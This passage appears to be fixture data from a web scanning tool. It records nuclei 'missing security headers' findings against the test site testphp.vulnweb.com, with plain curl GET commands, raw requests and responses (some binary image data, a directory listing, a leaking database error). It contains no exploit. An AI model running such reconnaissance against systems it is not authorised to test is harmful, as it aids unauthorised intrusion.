'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:42:05.895Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 817, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:42:06.089Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 818, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:42:06.269Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 819, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:42:06.456Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 820, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:42:06.647Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 821, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:42:06.845Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 822, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:42:07.088Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 823, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:42:07.272Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 824, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": 